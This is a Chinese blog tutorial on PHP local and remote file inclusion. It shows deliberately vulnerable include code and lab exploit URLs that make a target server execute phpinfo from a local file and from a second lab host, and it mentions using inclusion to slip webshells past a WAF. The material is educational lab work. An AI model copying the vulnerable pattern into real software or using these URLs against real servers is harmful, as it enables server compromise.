【文件包含漏洞02】文件包含漏洞原理及本地远程两种攻击方式

已于 2022-07-01 04:42:56 修改
阅读量4.8k 收藏 12
点赞数 1
分类专栏: # 筑基07:WEB漏洞原理 文章标签: php 安全 web安全 文件包含 include
于 2022-03-10 11:34:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fighting_hawk/article/details/123388521
版权

目录

1 文件包含漏洞

1.1 概述

  1. 概述:文件包含漏洞:即file inclusion,意思是文件包含,是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),requir_once())利用URL去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。
  2. 文件包含分类:
    (1)本地文件包含LFI(local file include)当被包含的文件在服务器本地时,就形成本地文件包含。
    (2)远程文件包含RFI(remote file include)当被包含的文件在第三方服务器时,叫做远程文件包含。
  3. 文件包含漏洞分类:
    (1)本地文件包含漏洞:当被包含的文件在服务器本地时,就形成的本地文件包含漏洞。
    (2)远程文件包含漏洞:当php.ini 中的配置选项allow_url_fopen和allow_url_include均为ON的话,则包含的文件可以是第三方服务器中的文件,这样就形成了远程文件包含漏洞。
  4. 背景:随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过就造成了文件包含漏洞。

1.2 原因

  1. 原因一:Web应用使用了动态包含。如以下代码,在第2行中定义了变量path并赋值,在第5行中文件包含了该变量。
<?php
$path = "./inc.php";
include ("./inc.php");
echo "<h1>This is include.php!</h1>";
include $path;
?>
  1. 原因二:动态包含的文件路径参数,客户端可控。如以下代码,变量path是从客户端请求中获取的,是用户可以控制的。
<?php
$path = $_GET['path'];
include ("./inc.php");
echo "<h1>This is include.php!</h1>";
include $path;
?>
  1. 原因三:未对用户输入参数进行全面过滤。

1.3 危害

  1. 严重性:一旦服务器存在文件包含漏洞,基本上会致使一切防御失效。像中国蚁剑、大马等,很多时候过不了安全狗,但是如果存在文件包含则可以利用该漏洞过狗。
  2. 两个特点:
    1. 无视文件扩展名读取文件。包含文件时,PHP会读取文件的源码,包括图片文件等。
    2. 无条件解析PHP代码。文件包含在读取文件源码的同时,如果遇到符合PHP语法规范的代码,就会无条件执行。

2 攻击实验

2.1 实验环境

  1. 本文实验基于WAMP环境进行测试,环境部署过程参考文章《win2008R2SP1+WAMP环境部署》。
  2. 在该环境网站根目录下,新建文件夹test,在test文件夹下新建以下文件进行实验。
  3. 新建一个txt文件,输入以下代码,并重命名为include.php。
<?php
$path = $_GET['path'];
echo "<h1>This is include.php!</h1>";
include $path;
?>

2.2 实验一:本地文件包含攻击

  1. 通过文件上传等其他手段,在网站目录及子目录下生成了info.php文件,文件代码如下:<?php phpinfo();?>
  2. 在真实机访问该网站,输入URL为http://192.168.1.4/test/include.php时,显示结果如下。由于代码第二行的path没有传入,弹出了提示;在第四行文件包含语句没有找到对应的文件,弹出警告。
    在这里插入图片描述
  3. 将URL修改为http://192.168.1.4/test/include.php?path=info.php,显示结果如下。可以看到参数成功传入给path,并在文件包含语句中被执行,也就是说存在于本地的一个文件被客户端控制着执行了,如果这个文件来历不明存在恶意代码则服务器被攻击。
    在这里插入图片描述

2.3 实验二:远程文件包含攻击

  1. 靶机上的网站和文件和实验一一样。

  2. 准备攻击靶机,让靶机的include.php文件以远程文件包含的方式来执行info.php,浏览器访问时将URL修改为http://192.168.1.4/test/include.php?path=http://192.168.1.4/test/info.php。可以看到网页显示如下,说该靶机服务器不允许include函数调用远程文件。
    在这里插入图片描述

  3. 这时候,如果靶机服务器的配置文件php.ini中将allow_url_include参数配置为On,就存在着被利用远程文件包含攻击的危险。将靶机配置文件修改如下并重启phpstudy。
    在这里插入图片描述

  4. 真实机浏览器再次访问http://192.168.1.4/test/include.php?path=http://192.168.1.4/test/info.php。可以看到远程文件被执行。
    在这里插入图片描述

  5. 上面的方式是以远程文件包含的方式访问本地的文件,接下来演示真的以远程文件包含的方式访问远程文件。这需要我们在另一台虚拟机系统上部署另一个网站,该网站上存在一个文件info.php,文件代码如下:<?php phpinfo();?>。该文件的网络地址为http://192.168.1.7/info.php
    在这里插入图片描述

  6. 真实机浏览器访问http://192.168.1.4/test/include.php?path=http://192.168.1.7/info.php。可以看到远程文件被执行,此时执行的文件位于第二台服务器上,PHP版本与第一台不一样。
    在这里插入图片描述

2.4 实验对比

实验一执行phpinfo()语句是在靶机本地,所以返回的PHP版本为5.4.45;实验二中第一次执行phpinfo()是本地的文件,PHP版本为5.4.45,第二次执行的phpinfo()是在另一个服务器上,只是将执行结果反馈给靶机,所以返回的PHP版本是5.2.17。

3 总结

  1. 理解文件包含漏洞产生的原因;
  2. 掌握本地与远程利用漏洞的方式。
Fighting_hawk
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全知识竞赛小测试--网络攻击技术.pdf
06-09
网络安全知识竞赛小测试 -网络攻击技术 1、通过寻找目标的安全漏洞、盗窃存放系统口令的文件、破译加密的口令,属于哪种行为( ) [单选题] * A.破解系统口令文件(正确答案) B.网络嗅探 C.键盘记录 D.中间人攻击 2、关于摆渡攻击的描述错误的是( )[单选题] * A.摆渡攻击是百度的一种攻击方式(正确答案) B.摆渡攻击是一种专门针对移动存储设备的攻击方式 C.摆渡攻击就是利用 u 盘作为"渡船" D.摆渡木马隐蔽性、针对性很强,一般只感染特定的计算机 3、以下选项中( )不属于 APT 攻击的特点。[单选题] * A.潜伏性 B.针对性 C.社会工程性 D.传染性(正确答案) 4、比特币是( )[单选题] * A.美国法定货币 B.网络通用电子货币 C.国际通用货币 D.有一定流通性和认可性的虚拟货币(正确答案) 5、使网络服务器中充斥着大量要求回复的信息,消耗带宽,导致网络或系统停止正常服务,这 属于什么攻击类型( )[单选题] * A.拒绝服务(正确答案) B.文件共享 C.BIND 漏洞 D.远程过程调用 6、关闭 WIFI 的自动连接功能可以防范( )[单选题] * A.所有恶意攻击 B.假冒热点攻击(正确答案) C.恶意代码 D.拒绝服务攻击 7、下列哪个不是 QQ 中毒的主要症状( )[单选题] * A.QQ 老是掉线,提示异地登陆 B.QQ 空间存在垃圾广告日志 C.自动给好友发送垃圾消息 D.登录时无网络连接(正确答案) 8、从网络攻击的位置来分,可以分为远程攻击和( )两种。[单选题] * A.本地攻击(正确答案) B.主动攻击 C.被动攻击 D.伪远程攻击 9、黑客在攻击中进行端口扫描可以完成( )。[单选题] * A.检测黑客自己计算机已开放哪些端口 B.口令破译 C.获知目标主机开放了哪些端口服务(正确答案) D.截获网络流量 10、许多黑客攻击都是利用软件实现中的缓冲区溢出的漏洞,对于这一威胁,最可靠的解决方 案是( )[单选题] * A.安装防火墙 B.给系统安装最新的补丁(正确答案) C.安装入侵检测系统 D.安装防病毒软件 11、Man-in-the-middle 攻击,简称 MITM,即( )[单选题] * A.重放攻击 B.拒绝服务攻击 C.中间人攻击(正确答案) D.后门漏洞攻击 12、使用漏洞库匹配的扫描方法,能发现( )[单选题] * A.未知的漏洞 B.已知的漏洞(正确答案) C.自行设计的软件中的漏洞 D.所有漏洞 13、哪一项不是防范漏洞的措施( )[单选题] * A.使用正版软件 B.关注信息安全新闻 C.利用补丁 D.使用盗版软件(正确答案) 14、以下关于黑帽子描述正确的是( )[单选题] * A.获得国际资质的黑客 B.没有获得国际资质的骇客 C.没有获得国际资质的高级程序员 D.放弃道德信念而恶意攻击的黑客(正确答案) 15、以下不能防止拖库的方法是( )[单选题] * A.重要帐号单独管理,其他的帐号无所谓 B.可以电脑允许自动"保存密码",但定期修改密码 C.分级管理密码,把密码记录在本地磁盘的某个特定的文档中 D.以上全部(正确答案) 16、摆渡攻击通常不会用以下哪个途径来窃取资料( )[单选题] * A.摄像头(正确答案) B.U 盘 C.移动硬盘 D.移动载体 17、心脏出血漏洞与以下哪个协议直接相关( )[单选题] * A.HTTP B.SSL(正确答案) C.TCP D.SMTP 18、中国工商银行的官网为 http://www.icbc.com.cn,某同学从网上获取到一个网址为 http://www.icdc.com.cn,用浏览器打开后跟官网的几乎完全相同。针对第二个网址以下说法 正确的是:( )[单选题] * A.该网站是工商银行网站的备份网站,可以放心使用。 B.该网站可能属于钓鱼网站,冒充工商银行网站进行诈骗活动。(正确答案) C.先确保防火墙已经打开,防病毒软件已正确工作,然后放心打开并使用。 D.发给同学让同学去打开,确保安全后再用 19、攻击者常用的攻击工具有(1)DoS 攻击工具,(2)木马程序,(3)分布式工具。其中 DoS 是指( )[单选题] * A.一种磁盘操作系统 B.拒绝服务(正确答案) C.一种黑客工具软件的名称 D.一种病毒的名称 20、TCP SYN 泛洪攻击原理是利用了( )[单选题] * A.TCP 三次握手过程(正确答案) B.TCP 面向流的工作机制 C.TCP 数据传输中的窗口技术 D.TCP 连接终止时的 FIN 报文 21、以下对 TCP 协议发起连接进行三次握手的叙述错误的是( )[单选题] * A.握手第一步:客户端发送一个 SYN 和 ACK 报文到服务器(正确答案) B.握手第二步:
web网站文件包含漏洞攻击-运维安全详细笔记总结
06-30
文件包含漏洞可以分为本地文件包含漏洞远程文件包含漏洞两种文件包含漏洞攻击步骤: 1. 准备有文件上传漏洞的网站 2. 客户端浏览器利用本地包含文件漏洞进行攻击 a) 使用正常合法的小图片,使用工具插入...
Web安全领域的探索之远程文件包含漏洞(LFI)
Innocence_0的博客
01-18 1389
Web安全领域的探索之远程文件包含漏洞(LFI)
文件包含漏洞全面详解
qq_53058639的博客
05-20 756
和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
7-2远程文件包含漏洞案例讲解和演示
山兔的博客
05-31 2132
远程文件包含漏洞测试  远程文件包含漏洞测试 远程文件包含漏洞 远程文件包含漏洞形式跟本地文件包含漏洞差不多,都是我们的开发人员在后台使用包含函数的时候,没有对它包含的目的地,进行相关的安全措施,导致前端传进来的目标地址,被直接包含进去 在本地文件包含漏洞中,它传进来的,只能是本地的文件,它只能在本地去读取相关路径下的一些文件 在远程包含漏洞中,攻击者可以通过访问外部地址来加载远程的代码 但是在PHP配置里面,我们可以通过一些特殊的配置,允许这个包含函数,去通过一些协议,比如http、ftp这样的协议,去
文件包含漏洞利用之本地包含配合文件上传包含图片马&&文件包含漏洞利用之远程包含Webshell
m0_73720136的博客
05-07 3113
通过本实验,掌握文件上传+文件包含的组合漏洞,在绕过上传的检测时可以制作图片马上传,图片马上传成功不能直接解析,可以利用文件包含的特点进行解析图片马。通过本实验,掌握在无其他漏洞,只有文件包含漏洞,且目标服务器本地无shell文件可利用,又可以远程文件包含时,可以在攻击机本地新建一个一句话木马文件(比如:shell.txt,不要以.php的文件存在,因为php文件在操作机本地会被解析),然后远程包含攻击机本地新建的木马文件,从而Getshell。
文件包含远程文件包含漏洞利用
wj33333的博客
11-20 708
文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。几乎所有的脚本语言都会提供文件包含的功能,但文件包含漏洞PHP WebApplication中居多,而在JSP、ASP、ASP.NET程序中却非常少,这是有些语言设计的弊端。(1 ) include等函数通过动态执行变量的方式引入需要包含的文件。如果文件有代码,会将包含文件以php文件的类型解析。(2)用户能控制该动态变量。1.查看配置是否开启。
信息安全技术:远程文件包含漏洞.pptx
11-01
一、远程文件包含漏洞原理 远程文件包含漏洞主要源于Web应用设计时未正确过滤用户输入,使得程序允许将远程URL作为参数加载。当`allow_url_fopen`和`allow_url_include`这两个PHP配置选项开启时,PHP会允许从HTTP或...
Apache-Tomcat从文件包含到RCE漏洞原理深入分析1
08-03
这个漏洞允许攻击者通过特定的输入,包含并执行Tomcat服务器上webapps目录下的任意文件,从而可能导致远程代码执行(RCE)。 漏洞的关键在于Apache Tomcat的AJP(Apache Jserv Protocol)协议。AJP是一种二进制协议...
15文件上传漏洞原理与实战.zip
最新发布
06-26
本主题将深入探讨文件上传漏洞原理攻击手段以及如何进行防御。 首先,我们来理解什么是文件上传漏洞。在许多Web应用中,用户可能需要上传图片、文档等文件以实现某些功能,如个人资料的编辑、内容分享等。然而...
拒绝超长函数,从两个curl远程漏洞说起.pdf
09-18
《拒绝超长函数,从两个curl远程漏洞说起》 这篇文档深入探讨了两个与curl相关的远程漏洞,它们分别被标记为CVE-2018-16890和CVE-2019-3822。curl,一个广泛使用的HTTP客户端库,由于其在处理NTLM(NT LAN Manager...
文件包含漏洞攻击(DVWA)
魔仙棒棒之主的博客
05-11 2835
文件包含漏洞攻击DVWA一、文件包含漏洞二、Low难度1. 源码分析2. 本地文件包含LFI1)相对路径2)绝对路径3. 远程文件包含RFI三、Medium难度1. 源码分析2. 本地文件包含LFI1)相对路径2)绝对路径3. 远程文件包含RFI四、High难度1. 源码分析2. 本地文件包含五、Impossible难度1. 源码分析 一、文件包含漏洞 PHP文件包含漏洞是一种注入型漏洞 注入型漏洞还有XSS漏洞和SQL注入漏洞 PHP文件包含可以直接执行包含文件的代码 包含的文件格式 是不受限制的,只要
web安全文件包含漏洞
weixin_67259816的博客
05-30 1228
该篇文章主要介绍一下文件包含漏洞的概念,成因,防御手法和一些攻击思路以及攻击方法。
DVWA—【文件包含漏洞】实验详解
weixin_52620919的博客
08-26 1545
LOW 实验关键代码 <?php $file = $_GET ['page'];//The page we wish to display ?> 这是一个典型的在动态网页中的用法,就像注我上一篇文章【文件包含漏洞原理】所讲,写入我们想要显示的页面。这里就是对用户的输入完全信任,因此就导致可以包含任意页面。 程序员在写程序的时候要站在不安全的角度上,而不是用户的角度上,这是从网站安全的角度来说。 实验: 接下来通过文件包含漏洞,查看位于根目录下的1.txt文件的内容,同过这两个实验对比总结远
Web安全文件包含漏洞
Python_0011的博客
03-20 934
程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这种文件调用的过程一般被称为文件包含。程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。动态包含。
文件包含漏洞利用
qq_56327824的博客
04-27 3086
文件包含漏洞给是“代码注入”的一种,“代码注入”这种攻击,其原理就是注入一段用户能控制的脚本或代码,并让服务器执行 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节 省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接
网络安全-文件上传漏洞原理攻击与防御
热门推荐
关注网络安全、云原生安全
08-16 1万+
介绍 文件上传漏洞是指用户上传了一个可执行的脚本文件(php、jsp、xml、cer等文件),而WEB系统没有进行检测或逻辑做的不够安全。文件上传功能本身没有问题,问题在于上传后如何处理及解释文件。 分类 根据简介,主要分为上传(客户端)、解析(服务端)两大类。 上传-javascript检测 简介 通过js代码,对文件后缀进行判断。 原理 一般使用白名单或黑名单的方式,判断文件后缀,根据后缀决定用户是否上传。 攻击 Firebug插件删除判断函数 使用靶机pikachu做例子,直接通
文件包含漏洞实验
IT1995的博客
03-11 5619
在本次实验前要先开启远程包含如下图所示:某php程序员小白将下面的代码命名成test.php部署到网站http://websecurity.163.com/的根目录下&lt;?php $filename = $_GET['file'];//将参数file的值传递给$filename $filename = str_replace( array( "http://", "http...
请查阅资料并举出一个远程文件包含漏洞,简述其原理
04-13
远程文件包含漏洞(Remote File Inclusion, RFI)是一种常见的Web安全漏洞,其原理攻击者利用目标网站处理用户输入时未能正确过滤和校验恶意输入,导致攻击者可以将任意远程文件包含到目标网站运行,从而实现攻击的目的。攻击者可以在远程文件中注入恶意代码,比如木马程序或者发送垃圾邮件的脚本,来窃取敏感信息、控制目标服务器甚至发起DDoS攻击。 一个经典的远程文件包含漏洞示例是在一个PHP程序中,将用户输入的GET参数直接包含到了一个动态包含语句中,攻击者可以构造一个特定的GET请求,将恶意的PHP代码包含到目标服务器上,从而执行攻击者的恶意代码。为防止RFI漏洞,可以对用户输入进行正确的过滤和校验,或者使用白名单机制,仅允许访问指定的文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值